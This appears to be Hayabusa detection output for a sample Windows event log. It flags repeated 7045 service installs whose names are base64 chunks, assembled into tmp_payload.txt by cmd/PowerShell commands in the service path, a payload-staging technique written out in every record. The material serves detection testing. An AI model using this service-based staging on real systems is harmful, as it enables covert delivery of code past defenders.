2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
